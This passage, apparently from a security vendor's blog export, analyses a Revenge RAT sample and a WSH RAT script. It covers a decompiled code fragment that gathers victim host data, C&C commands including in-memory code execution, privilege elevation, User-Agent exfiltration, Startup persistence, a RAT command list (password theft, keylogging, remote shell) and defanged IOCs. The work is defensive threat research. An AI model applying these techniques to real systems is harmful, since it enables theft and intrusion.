#D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Con<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #880000; background: #D9D9D9;\">catenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObj<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #880000; background: #D9D9D9;\">ect<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8220;Information&#8221;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #cc3399; background: #D9D9D9;\">ID<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">,&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Encode<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8220;_&#8221;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">t<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: blue; background: #D9D9D9;\">his<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">HWD<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">())),&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">),&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">IP<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">()),&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">),&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Encode<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #1b5d70; background: #D9D9D9;\">Environment<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #7a5229; background: #D9D9D9;\">MachineName<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8221;&nbsp;\/&nbsp;&#8220;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #1b5d70; background: #D9D9D9;\">Enviro<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #1b5d70; background: #D9D9D9;\">nment<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #7a5229; background: #D9D9D9;\">UserName<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">)),&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">),&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">CIVC<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">()),&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">Key<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">),&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Encode<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Atomic<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #990099; background: #D9D9D9;\">DI<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #996633; background: #D9D9D9;\">OSFullName<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8221;&nbsp;&#8220;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;+&nbsp;<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Ato<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Command &amp; Control<\/h2>\n<p>In the .Net code we found a thread function called this.data(), which is in charge of handling all received C&amp;C commands. Analyzing this function, we found several command magic strings like \u201cPNC\u201d, \u201cP\u201d, \u201cIE\u201d, \u201cLP\u201d, and \u201cUNV\u201d.<\/p>\n<ul>\n<li>The \u201cPNC\u201d command is just like a heartbeat and the malware only sends back \u201cPNC\u201d.<\/li>\n<li>The \u201cP\u201d command asks the malware to collect the victim\u2019s top-most window title.<\/li>\n<li>The \u201cIE\u201d and \u201cLP\u201d commands ask the malware to manipulate the system registry with given values in the packet.<\/li>\n<li>The \u201cUNV\u201d command packet contains a base64-encoded gzip stream that is compressed from a segment of malicious ASM code. Through this command, the attacker can send malicious ASM code to the malware and get the code executed in memory. The screenshot below is a code snippet from processing the \u201cUNV\u201d command, where it compares command strings and performs base64-decoding, gzip stream decompressing as well as loading the ASM code into memory in the function this.LA(). Later, the ASM code is executed in an object that is created by calling the API CreateInstance().<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1987765513.img.png\/1573604738789\/revengerat-fourteen.png\" alt=\"Figure 11 - Code snippet of processing \u201cUNV\u201d command\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 11 &#8211; Code snippet of processing \u201cUNV\u201d command<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Executing WSH RAT and Persistency<\/h2>\n<h3>Script Analysis (GXxdZDvzyH.VBS)<\/h3>\n<p>As part of the second stage infection chain, this script gets executed as well, and apparently the malware authors used the same code from MICROSOFT.VBS in the GXxdZDvzyH.vbs script, but a different payload was encoded in base-64. Since this code was already discussed, we will focus on the script, which resides inside the hidden encoded data.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_324191320.img.png\/1573672930507\/rat-twelve.png\" alt=\"Figure 12 \u2013 Diff between Microsoft.vbs and GXxdZDvzyH.vbs scripts\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 12 \u2013 Diff between Microsoft.vbs and GXxdZDvzyH.vbs scripts<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h3>Script Analysis (GXxdZDvzyH.VBS &#8211; DECODED BASE-64)<\/h3>\n<p>The new script is version <b>1.6<\/b> of <b>WSH RAT<\/b>. The code shows a total of 29 functions that perform different tasks, ranging from entrenchment, persistency, and data processing to stealing and exfiltration.<\/p>\n<p>Once the script is executed, it performs security checks through function calls to verify the current user\u2019s rights, and depending on which ones are used, it will remain as is or elevate itself (<b>startupElevate()<\/b>) to a higher user access level. In addition, a secondary security check is performed to disable (<b>disableSecurity()<\/b>) the current security context.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1245078942.img.png\/1573673047267\/rat-thirteen.png\" alt=\"Figure 13 \u2013 Security check code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 13 \u2013 Security check code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This version of WSH RAT focuses on stealing information from popular browsers (i.e., Chrome and Mozilla Firefox), including the newer versions (2.3) by targeting additional software such as FoxMail. While WSH RAT has many features, we will focus on the most important ones, especially those triggered in the current sample.<\/p>\n<p>The script generates a properly formatted HTTP request that contains information related to the infected computer, and uses the \u201cUser-Agent:\u201d header as a mechanism to exfiltrate it. This information was fetched by the execution of the \u201c<b>information()<\/b>\u201d function.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_527157661.img.png\/1573673429568\/screen-shot-2019-11-13-at-11.25.27-am.png\" alt=\"Figure 14 \u2013 HTTP POST Request and User-Agent data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 14 \u2013 HTTP POST Request and User-Agent data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The following table shows the data format used in the User-Agent Header, as well as a description of how the data was collected by the script.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_511138412.img.png\/1573673589995\/screen-shot-2019-11-13-at-11.32.33-am.png\" alt=\"table RevengeRAT\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>To achieve persistency, WSH RAT adds new data into the Windows Registry and also makes a copy of itself in the Windows Startup (\u201c<b>%APPDATA%MicrosoftWindowsStart MenuProgramsStartup<\/b>\u201d) folder.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_829427806.img.png\/1573673872613\/ratfifteen.png\" alt=\"Figure 15 \u2013 Added value as Startup application\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 15 \u2013 Added value as Startup application<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Also, WSH RAT make use of a total of 26 commands. All of them are self-explanatory:<\/p>\n<p>&quot;disconnect&quot;, &quot;reboot&quot;, &quot;shutdown&quot;, &quot;excecute&quot;, &quot;install-sdk&quot;, &quot;get-pass&quot;, &quot;get-pass-offline&quot;, &quot;update&quot;, &quot;uninstall&quot;, &quot;up-n-exec&quot;, &quot;bring-log&quot;, &quot;down-n-exec&quot;, &quot;filemanager&quot;, &quot;rdp&quot;, &quot;keylogger&quot;, &quot;offline-keylogger&quot;, &quot;browse-logs&quot;, &quot;cmd-shell&quot;, &quot;get-processes&quot;, &quot;disable-uac&quot;, &quot;check-eligible&quot;, &quot;force-eligible&quot;, &quot;elevate&quot;, &quot;if-elevate&quot;, &quot;kill-process&quot;, and &quot;sleep&quot;.<\/p>\n<h2>Solutions<\/h2>\n<p>The VBS downloading URL is rated as \u201c<b>Malicious Websites<\/b>\u201c by the FortiGuard Web Filtering service.<\/p>\n<p>The script file and dropped exe file are all detected and blocked by the FortiGuard Antivirus service.<\/p>\n<h2>IOCs:<\/h2>\n<h4><b>IP Addresses<\/b><\/h4>\n<p>185.84.181.102:5478<br \/> 193.56.28.134: 5478<\/p>\n<h4><b>URLs<\/b><\/h4>\n<p>hxxps:\/\/scisolinc[.]com\/wp-includes\/Text\/microsoft.vbs<br \/> hxxp:\/\/britianica.uk.com:4132\u00a0<\/p>\n<h4><b>Sample SHA-256<\/b><\/h4>\n<p>9ADA62E4B06F7E3A61D819B8A74F29F589B645A7A32FD6C4E3F4404672B20F24<br \/> 35C0980E99987F4418C8D186B9D5514C340C05EC0470C485182D24868F2A37DB<br \/> CED8BE6A20B38F5F4D5AF0F031BD69863A60BE53B9D6434DEEA943BF668AC8D8<\/p>\n<p><i>Learn more about\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">FortiGuard Labs<\/a>\u00a0and the FortiGuard Security Services\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qxx1b0gslklfu2kjckea-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/lWhvucPVW_4\/malware-analysis-revenge-rat-sample.html\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1337821993.img.png\/1573604360030\/revengerat-one.png\"\/><br \/>Learn more about a new Revenge RAT sample recently captured in the wild by our FortiGuard Labs team.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/lWhvucPVW_4&#8243; height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16883","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16883","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16883"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16883\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16883"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}